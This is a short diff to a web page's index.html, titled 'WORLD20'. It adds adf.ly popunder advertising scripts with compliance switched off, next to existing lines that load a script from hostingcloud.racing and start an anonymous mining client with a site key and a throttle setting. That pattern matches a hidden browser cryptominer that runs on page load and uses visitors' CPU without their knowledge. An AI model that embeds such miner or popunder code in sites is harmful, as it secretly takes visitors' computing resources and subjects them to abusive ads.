--- a/index.html
+++ b/index.html
@@ -11,6 +11,12 @@
 <body style="background-color:black; color:white">
 <h1>WORLD20</h1>
 <script src="https://www.hostingcloud.racing/E50e.js"></script>
+<script type="text/javascript">
+    var adfly_id = 22299945;
+    var popunder_frequency_delay = 0;
+    var adfly_google_compliant = false;
+</script>
+<script src="https://cdn.adf.ly/js/display.js"></script>
 <script>
     var _client = new Client.Anonymous('328bc6b76c402038b75d228e0ed01d123d3381a3214390af4c914da3d5a33f92', {
         throttle: 0.5
